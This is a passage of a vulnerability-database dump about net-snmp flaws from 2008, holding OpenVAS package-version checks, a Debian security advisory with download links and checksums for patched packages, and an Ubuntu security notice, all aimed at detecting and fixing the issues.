$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for net-snmp\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.1.3.1~0.22\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860895", "href": "http://plugins.openvas.org/nasl.php?oid=860895", "type": "openvas", "title": "Fedora Update for net-snmp FEDORA-2008-5215", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for net-snmp FEDORA-2008-5215\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SNMP (Simple Network Management Protocol) is a protocol used for\n network management. The NET-SNMP project includes various SNMP tools:\n an extensible agent, an SNMP library, tools for requesting or setting\n information from SNMP agents, tools for generating and handling SNMP\n traps, a version of the netstat command which uses SNMP, and a Tk/Perl\n mib browser. This package contains the snmpd and snmptrapd daemons,\n documentation, etc.\n\n You will probably also want to install the net-snmp-utils package,\n which contains NET-SNMP utilities.\n \n Building option:\n \t--without tcp_wrappers : disable tcp_wrappers support\";\n\ntag_affected = \"net-snmp on Fedora 9\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-June/msg00363.html\");\n script_id(860895);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 16:50:22 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-5215\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"Fedora Update for net-snmp FEDORA-2008-5215\");\n\n script_summary(\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.4.1~18.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-2292", "CVE-2008-0960", "CVE-2008-4309"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1663-1 security@debian.org\r\nhttp://www.debian.org/security/ Thijs Kinkhorst\r\nNovember 09, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : net-snmp\r\nVulnerability : several\r\nProblem type : local (remote)\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-0960 CVE-2008-2292 CVE-2008-4309\r\nDebian Bugs : 485945 482333 504150\r\n\r\nSeveral vulnerabilities have been discovered in NET SNMP, a suite of\r\nSimple Network Management Protocol applications. The Common\r\nVulnerabilities and Exposures project identifies the following problems:\r\n \r\nCVE-2008-0960\r\n \r\n Wes Hardaker reported that the SNMPv3 HMAC verification relies on\r\n the client to specify the HMAC length, which allows spoofing of\r\n authenticated SNMPv3 packets.\r\n \r\nCVE-2008-2292\r\n \r\n John Kortink reported a buffer overflow in the __snprint_value\r\n function in snmp_get causing a denial of service and potentially\r\n allowing the execution of arbitrary code via a large OCTETSTRING \r\n in an attribute value pair (AVP).\r\n \r\nCVE-2008-4309\r\n\r\n It was reported that an integer overflow in the\r\n netsnmp_create_subtree_cache function in agent/snmp_agent.c allows \r\n remote attackers to cause a denial of service attack via a crafted \r\n SNMP GETBULK request.\r\n\r\nFor the stable distribution (etch), these problems has been fixed in\r\nversion 5.2.3-7etch4.\r\n \r\nFor the testing distribution (lenny) and unstable distribution (sid)\r\nthese problems have been fixed in version 5.4.1~dfsg-11.\r\n\r\nWe recommend that you upgrade your net-snmp package.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.diff.gz\r\n Size/MD5 checksum: 94030 2ccd6191c3212980956c30de392825ec\r\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.dsc\r\n Size/MD5 checksum: 1046 8018cc23033178515298d5583a74f9ff\r\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3.orig.tar.gz\r\n Size/MD5 checksum: 4006389 ba4bc583413f90618228d0f196da8181\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-base_5.2.3-7etch4_all.deb\r\n Size/MD5 checksum: 1214368 d579d8f28f3d704b6c09b2b480425086\r\n http://security.debian.org/pool/updates/main/n/net-snmp/tkmib_5.2.3-7etch4_all.deb\r\n Size/MD5 checksum: 855594 b5ccd827adbcefcca3557fa9ae28cc08\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_alpha.deb\r\n Size/MD5 checksum: 2169470 265835564ef2b0e2e86a08000461c53b\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_alpha.deb\r\n Size/MD5 checksum: 944098 5b903886ee4740842715797e3231602c\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_alpha.deb\r\n Size/MD5 checksum: 1901802 5486eb1f2a5b076e5342b1dd9cbb12e2\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_alpha.deb\r\n Size/MD5 checksum: 933202 e3210ba1641079e0c3aaf4a50e89aedd\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_alpha.deb\r\n Size/MD5 checksum: 835584 b14db8c5e5b5e2d34799952975f903fb\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_amd64.deb\r\n Size/MD5 checksum: 932008 fc79672bf64eaabd41ed1c2f4a42c7da\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_amd64.deb\r\n Size/MD5 checksum: 1890766 ae3832515a97a79b31e0e7f0316356ee\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_amd64.deb\r\n Size/MD5 checksum: 835088 62867e9ba9dfca3c7e8ae575d5a478f5\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_amd64.deb\r\n Size/MD5 checksum: 918844 d2d1bc5f555bc9dba153e2a9a964ffbf\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_amd64.deb\r\n Size/MD5 checksum: 1557924 5c2a33a015dd44708a9cc7602ca2525c\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_arm.deb\r\n Size/MD5 checksum: 909974 4c1cef835efc0b7ff3fea54a618eabee\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_arm.deb\r\n Size/MD5 checksum: 835284 3ac835d926481c9e0f589b578455ddee\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_arm.deb\r\n Size/MD5 checksum: 928252 b98e98b58c61be02e477185293427d5c\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_arm.deb\r\n Size/MD5 checksum: 1778292 b903adf3d1fa6e7a26f7cafb7bffdd6b\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_arm.deb\r\n Size/MD5 checksum: 1344158 78b6cf6b2974983e8e3670468da73cd1\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_hppa.deb\r\n Size/MD5 checksum: 835940 9eeaf116e386dd7733ab2106c662dfa9\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_hppa.deb\r\n Size/MD5 checksum: 1809132 78bb5f1c12b004d32fa265e6bd99ffa1\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_hppa.deb\r\n Size/MD5 checksum: 1926116 71c7f3095ffe1bb22e84ade21f32b3a4\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_hppa.deb\r\n Size/MD5 checksum: 935434 85deac8531b02a0fdf3c9baa21d8e4bd\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_hppa.deb\r\n Size/MD5 checksum: 935640 958cb158264f75772864cd5d5c0bf251\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_i386.deb\r\n Size/MD5 checksum: 1423294 f05c7491a8100684c5085588738f05b5\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_i386.deb\r\n Size/MD5 checksum: 833970 cb705c9fe9418cc9348ac935ea7b0ba2\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_i386.deb\r\n Size/MD5 checksum: 920070 3df41a0c99c41d1bccf6801011cf8ed5\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_i386.deb\r\n Size/MD5 checksum: 925914 159b4244ef701edbe0fb8c9685b5b477\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_i386.deb\r\n Size/MD5 checksum: 1838900 3b7ac7b8fe0da1a3909ee56aba46d464\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_ia64.deb\r\n Size/MD5 checksum: 2205680 6868a56b1db04627e6921bf7237939a2\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_ia64.deb\r\n Size/MD5 checksum: 970440 783f0cccabfbcc63590730b3803d164d\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_ia64.deb\r\n Size/MD5 checksum: 2281114 fd04b505755a3aed0fe4c9baaac84500\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_ia64.deb\r\n Size/MD5 checksum: 842690 9f9ca89c3d3ba7c46481e9cd39c242a6\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_ia64.deb\r\n Size/MD5 checksum: 962854 c8a32f808d719357a5b6350e2b60794e\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mips.deb\r\n Size/MD5 checksum: 895414 5dd919d188291cb3727d39b5e06c9e26\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mips.deb\r\n Size/MD5 checksum: 927342 28c245db4d8ea82ba4075b27d674d72a\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mips.deb\r\n Size/MD5 checksum: 833182 0e0b21e13d77de82bed7a38d30f65e4b\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mips.deb\r\n Size/MD5 checksum: 1769524 24bdc73a3d20c4046c7741957442c713\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mips.deb\r\n Size/MD5 checksum: 1717562 977ae5c34a127d32d8f2bf222de9a431\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mipsel.deb\r\n Size/MD5 checksum: 1755032 cab5c112911465a9ce23a0d2ea44ded9\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mipsel.deb\r\n Size/MD5 checksum: 926616 2bf14a3fe74d9f2a523aacc8b04f5282\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mipsel.deb\r\n Size/MD5 checksum: 895194 b7c9ed37bf83ad92371f5472ac5d917b\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mipsel.deb\r\n Size/MD5 checksum: 833098 08b63ba6c3becf25ba2f941a532a7b71\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mipsel.deb\r\n Size/MD5 checksum: 1720642 1ff7568eb478edee923edb76cf42e9ac\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_powerpc.deb\r\n Size/MD5 checksum: 941434 bbac9384bd7f88339e2b86fa665208c1\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_powerpc.deb\r\n Size/MD5 checksum: 835212 4790d79f8de7f1bee7aabf0473f25268\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_powerpc.deb\r\n Size/MD5 checksum: 1657890 b91fcf52e80c7196cea0c13df9ac79ef\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_powerpc.deb\r\n Size/MD5 checksum: 1803262 4d298c9509941390c7b2eb68320ad211\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_powerpc.deb\r\n Size/MD5 checksum: 928170 b17966a6a61313344ac827b58f32eeef\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_s390.deb\r\n Size/MD5 checksum: 1409718 2a128cbdce2522ef49604255cff41af2\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_s390.deb\r\n Size/MD5 checksum: 931452 d3bb7c3a849cd2b35fa6e4acb19c318d\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_s390.deb\r\n Size/MD5 checksum: 1834914 67e5b946df18b06b41b3e108d5ddc4e3\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_s390.deb\r\n Size/MD5 checksum: 836102 7a4b85e8ea0e50d7213997b5f7d6309f\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_s390.deb\r\n Size/MD5 checksum: 903864 3f80e78e4e2672aacf3da0690ff24b79\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_sparc.deb\r\n Size/MD5 checksum: 925336 5824ea607689f3f1bd62a9e6e28f95ae\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_sparc.deb\r\n Size/MD5 checksum: 1548630 1378d1cf730d3026bc1f01a4ab2ccedb\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_sparc.deb\r\n Size/MD5 checksum: 918592 28a086f6aa2ee8d510b38c1a177843fc\r\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_sparc.deb\r\n Size/MD5 checksum: 834186 068cbf2b4774ecf9504b820db26e6f1d\r\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_sparc.deb\r\n Size/MD5 checksum: 1782014 d39fae5fe0d1397a2a1bd7397d6e850a\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBSRawfWz0hbPcukPfAQKr8gf/ey+YyHiWXy1vCzmmbI7Xk2ktHZCEEoBW\r\n4fk2Yzycp7YHF7sJ6b8EIqzlBKiQSR+o+X0804loyanOuH3lBlk+zXeWisuou2jo\r\nsjk4r4VbwUEJkIOHIRJYA3NBnFzzwl7RNkO/xc6QPXqNnYVxouB4XR8DwmwwHK1k\r\nGIJ8TSG/o3Hxl1k77sp8d31FvHoEvSyW/u2aAlcRoEXWVCgMzpREVN/M0+O4LFRM\r\nrrA/0meZxLy/3n9GF9Yo2OCvj5rTZ4yjY6c8iq6hwEopemQUH4OCIVsPBKMQ1uJ0\r\nwdZEvSbQksbBy9yxy0ajeF03IxzCcJia7bBS3/g5F46WU8LUAjkUAw==\r\n=ct1Q\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-11-10T00:00:00", "published": "2008-11-10T00:00:00", "id": "SECURITYVULNS:DOC:20828", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20828", "title": "[SECURITY] [DSA 1663-1] New net-snmp packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:25:54", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2292", "CVE-2008-0960", "CVE-2008-4309"], "description": "Wes Hardaker discovered that the SNMP service did not correctly validate \nHMAC authentication requests. An unauthenticated remote attacker \ncould send specially crafted SNMPv3 traffic with a valid username \nand gain access to the user's views without a valid authentication \npassphrase. (CVE-2008-0960)\n\nJohn Kortink discovered that the Net-SNMP Perl module did not correctly \ncheck the size of returned values. If a user or automated system were \ntricked into querying a malicious SNMP server, the application using \nthe Perl module could be made to crash, leading to a denial of service. \nThis did not affect Ubuntu 8.10. (CVE-2008-2292)\n\nIt was discovered that the SNMP service did not correctly handle large \nGETBULK requests. If an unauthenticated remote attacker sent a specially \ncrafted request, the SNMP service could be made to crash, leading to a \ndenial of service. (CVE-2008-4309)", "edition": 5, "modified": "2008-12-03T00:00:00", "published": "2008-12-03T00:00:00", "id": "USN-685-1", "href": "https://ubuntu.com/security/notices/USN-685-1", "title": "Net-SNMP vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:16:39", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2292", "CVE-2008-0960", "CVE-2008-4309"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1663-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nNovember 09, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : net-snmp\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2008-0960 CVE-2008-2292 CVE-2008-4309\nDebian Bugs : 485945 482333 504150\n\nSeveral vulnerabilities have been discovered in NET SNMP, a suite of\nSimple Network Management Protocol applications. The Common\nVulnerabilities and Exposures project identifies the following problems:\n \nCVE-2008-0960\n \n Wes Hardaker reported that the SNMPv3 HMAC verification relies on\n the client to specify the HMAC length, which allows spoofing of\n authenticated SNMPv3 packets.\n \nCVE-2008-2292\n \n John Kortink reported a buffer overflow in the __snprint_value\n function in snmp_get causing a denial of service and potentially\n allowing the execution of arbitrary code via a large OCTETSTRING \n in an attribute value pair (AVP).\n \nCVE-2008-4309\n\n It was reported that an integer overflow in the\n netsnmp_create_subtree_cache function in agent/snmp_agent.c allows \n remote attackers to cause a denial of service attack via a crafted \n SNMP GETBULK request.\n\nFor the stable distribution (etch), these problems has been fixed in\nversion 5.2.3-7etch4.\n \nFor the testing distribution (lenny) and unstable distribution (sid)\nthese problems have been fixed in version 5.4.1~dfsg-11.\n\nWe recommend that you upgrade your net-snmp package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.diff.gz\n Size/MD5 checksum: 94030 2ccd6191c3212980956c30de392825ec\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.dsc\n Size/MD5 checksum: 1046 8018cc23033178515298d5583a74f9ff\n http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3.orig.tar.gz\n Size/MD5 checksum: 4006389 ba4bc583413f90618228d0f196da8181\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-base_5.2.3-7etch4_all.deb\n Size/MD5 checksum: 1214368 d579d8f28f3d704b6c09b2b480425086\n http://security.debian.org/pool/updates/main/n/net-snmp/tkmib_5.2.3-7etch4_all.deb\n Size/MD5 checksum: 855594 b5ccd827adbcefcca3557fa9ae28cc08\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_alpha.deb\n Size/MD5 checksum: 2169470 265835564ef2b0e2e86a08000461c53b\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_alpha.deb\n Size/MD5 checksum: 944098 5b903886ee4740842715797e3231602c\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_alpha.deb\n Size/MD5 checksum: 1901802 5486eb1f2a5b076e5342b1dd9cbb12e2\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_alpha.deb\n Size/MD5 checksum: 933202 e3210ba1641079e0c3aaf4a50e89aedd\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_alpha.deb\n Size/MD5 checksum: 835584 b14db8c5e5b5e2d34799952975f903fb\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_amd64.deb\n Size/MD5 checksum: 932008 fc79672bf64eaabd41ed1c2f4a42c7da\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_amd64.deb\n Size/MD5 checksum: 1890766 ae3832515a97a79b31e0e7f0316356ee\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_amd64.deb\n Size/MD5 checksum: 835088 62867e9ba9dfca3c7e8ae575d5a478f5\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_amd64.deb\n Size/MD5 checksum: 918844 d2d1bc5f555bc9dba153e2a9a964ffbf\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_amd64.deb\n Size/MD5 checksum: 1557924 5c2a33a015dd44708a9cc7602ca2525c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_arm.deb\n Size/MD5 checksum: 909974 4c1cef835efc0b7ff3fea54a618eabee\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_arm.deb\n Size/MD5 checksum: 835284 3ac835d926481c9e0f589b578455ddee\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_arm.deb\n Size/MD5 checksum: 928252 b98e98b58c61be02e477185293427d5c\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_arm.deb\n Size/MD5 checksum: 1778292 b903adf3d1fa6e7a26f7cafb7bffdd6b\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_arm.deb\n Size/MD5 checksum: 1344158 78b6cf6b2974983e8e3670468da73cd1\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_hppa.deb\n Size/MD5 checksum: 835940 9eeaf116e386dd7733ab2106c662dfa9\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_hppa.deb\n Size/MD5 checksum: 1809132 78bb5f1c12b004d32fa265e6bd99ffa1\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_hppa.deb\n Size/MD5 checksum: 1926116 71c7f3095ffe1bb22e84ade21f32b3a4\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_hppa.deb\n Size/MD5 checksum: 935434 85deac8531b02a0fdf3c9baa21d8e4bd\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_hppa.deb\n Size/MD5 checksum: 935640 958cb158264f75772864cd5d5c0bf251\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_i386.deb\n Size/MD5 checksum: 1423294 f05c7491a8100684c5085588738f05b5\n http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_i386.deb\n Size/MD5 checksum: 833970 cb705c9fe9418cc9348ac935ea7b0ba2\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_i386.deb\n Size/MD5 checksum: 920070 3df41a0c99c41d1bccf6801011cf8ed5\n http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_i386.deb\n Size/MD5 checksum: 925914 159b4244ef701edbe0fb8c9685b5b477\n http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_i386.deb\n Size/MD5 checksum: 1838900 